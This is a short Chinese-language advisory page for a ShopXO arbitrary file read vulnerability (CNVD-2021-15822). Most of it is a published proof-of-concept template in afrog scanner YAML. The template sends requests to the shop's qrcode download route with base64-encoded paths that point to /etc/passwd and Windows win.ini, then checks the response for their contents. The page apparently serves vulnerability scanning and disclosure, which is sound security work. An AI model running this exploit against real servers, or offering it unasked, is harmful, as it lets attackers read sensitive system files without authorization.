CNVD-2021-15822: ShopXO 任意文件读取漏洞

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

ShopXO 存在文件读取漏洞,攻击者可通过该漏洞读取系统敏感文件。

PoC代码[已公开]

id: CNVD-2021-15822

info:
  name: ShopXO 任意文件读取漏洞
  author: Print1n
  severity: high
  description: |-
    ShopXO 存在文件读取漏洞,攻击者可通过该漏洞读取系统敏感文件。
  reference:
    - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-15822
  tags: shopxo,cnvd,cnvd2021,fileread
  created: 2021/10/23

rules:
  Linux0:
    request:
      method: GET
      path: /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
  Windows0:
    request:
      method: GET
      path: /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ=
    expression: |
      response.status == 200 &&
      response.body.ibcontains(b"[fonts]") &&
      response.body.ibcontains(b"[extensions]")
expression: Linux0() || Windows0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CNVD/2021/CNVD-2021-15822.yaml